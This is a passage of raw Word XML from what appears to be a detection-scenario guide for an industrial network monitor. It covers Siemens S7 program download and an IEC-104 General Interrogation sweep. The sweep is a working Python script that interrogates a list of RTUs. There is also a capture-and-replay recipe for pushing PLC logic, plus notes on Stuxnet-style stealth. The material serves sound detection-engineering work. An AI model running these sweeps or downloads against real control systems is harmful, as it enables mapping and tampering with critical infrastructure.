            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>S7Comm (download blocks via FC 0x1A/0x1B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Persistence / Impair Process Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>An attacker with engineering-workstation-level access can push modified ladder logic, function blocks, or even firmware to a Siemens PLC. Unlike STOP, the PLC keeps running — but now with the attacker's logic. This is Stuxnet-class persistence: the malicious logic survives reboots, evades integrity checks done from the same workstation (because the workstation is the source of truth), and only manifests under specific operating conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Simulate by sending S7Comm Setup Communication followed by a Download Block sequence. `python-snap7` does not directly expose program download; the cleanest demo reproduction is to capture a real pcap from TIA Portal performing a download to the lab PLC and replay it.</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scenario06_program_download.sh</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 1. From TIA Portal, perform a download to the lab S7-1500 (10.10.2.20).</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 2. Capture the session:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo tcpdump -i eth1 -w scenario06_download.pcap host 10.10.2.20 and port 102</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 3. Stop capture once TIA reports 'Download successful'.</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 4. Replay against OTShield:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>curl -X POST http://localhost:8080/api/pcaps/upload \</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H 'Authorization: Bearer $TOKEN' \</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -F 'file=@scenario06_download.pcap'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Alternative — synthetic scapy reproduction:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Generate a sequence of S7 'Request Download' (job=0x1A) and 'Download Block'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># (job=0x1B) PDUs targeting block OB1. See backend tests under</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># /backend/src/test/.../S7CommDissectorTest.java for fixture bytes.</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the demo environment can't run TIA Portal, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S7CommDissectorTest.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> fixtures include a realistic download sequence that can be assembled into a pcap with scapy + struct.</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dpi.unauthorized_write — fires if download crosses Purdue zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.s7_program_download — to be implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>S7 FC 0x1A (Request Download) + N×FC 0x1B (Download Block) within one session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0843 — Program Download</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Today: anomaly fires only if the engineering workstation is in a different Purdue zone than the PLC. Evidence panel shows multiple S7 PDUs in the same conduit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verify the DPI event count on the L3 → L1 edge spikes (downloads are dozens to hundreds of PDUs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the dedicated rule lands: anomaly title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S7 program download detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>s7_block:OB1 transferred_bytes:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Program download is the highest-impact ICS attack class — it converts a network intrusion into a permanent control-system compromise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — malicious logic survives PLC reboots, network isolation, and antivirus on the engineering workstation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Stealth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — TIA Portal will continue to show the *workstation copy* of the project unless the operator does an 'upload from PLC' compare. Most don't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Logic-bomb potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stuxnet pattern: change behaviour only when a specific process variable crosses a threshold, so QA testing in non-prod doesn't expose the change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Detection here is structural — the dissector already labels download PDUs, but no rule consumes the label:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.s7_program_download rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — count download PDUs per session, fire CRITICAL if &gt; 0 from any source other than an allowlisted engineering workstation IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Engineering-workstation allowlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Settings page for the analyst to enroll trusted engineering hosts. Hostnames should resolve via reverse DNS or asset inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Block-level diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — capture the downloaded block bytes and diff against the previous version stored in the asset's project archive. Requires a project-archive feature (currently absent).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 07  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>IEC-104 General Interrogation sweep</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T0846 — Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IEC 60870-5-104 (TCP/2404)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>IEC-104 General Interrogation (TI=100, C_IC_NA_1) is a normal command issued by a SCADA master to ask an RTU for its complete current state. Issuing it from an unexpected source, or repeatedly across many RTUs in a short window, indicates someone is mapping the substation's I/O. This is the IEC-104 analogue of Modbus FC 0x03 walking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Use the `iec104` Python library (or scapy with manual APDU construction). Issue a GI to each RTU IP in sequence.</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scenario07_iec104_gi_sweep.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import socket, struct, time</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Build IEC-104 APDU: I-format frame, ASDU TI=100 (C_IC_NA_1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Layout: 0x68 | LEN | CTRL(4) | ASDU</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># ASDU: TI(1)=100 | VSQ(1)=1 | COT(2)=6(activation) | CA(2)=1 | IOA(3)=0 | QOI(1)=20</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>def gi_apdu(send_seq, recv_seq):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    asdu = struct.pack('&lt;BBHH', 100, 1, 6, 1) + b'\x00\x00\x00' + bytes([20])</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ctrl = struct.pack('&lt;HH', send_seq &lt;&lt; 1, recv_seq &lt;&lt; 1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    body = ctrl + asdu</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return bytes([0x68, len(body)]) + body</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RTUS = ['10.40.1.10','10.40.1.11','10.40.1.12','10.40.1.13','10.40.1.14']</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>for ip in RTUS:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    s = socket.create_connection((ip, 2404), timeout=3)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    s.sendall(b'\x68\x04\x07\x00\x00\x00')   # STARTDT act</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    s.recv(64)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    s.sendall(gi_apdu(0, 0))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    print(ip, '&lt;-', s.recv(2048)[:32].hex())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    s.close()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    time.sleep(0.2)</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>STARTDT (Start Data Transfer) is required before any I-format frame; the snippet sends it once per RTU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture at the substation gateway with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i eth1 port 2404 -w scenario07_iec104_gi.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.rare_function_code (per-RTU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
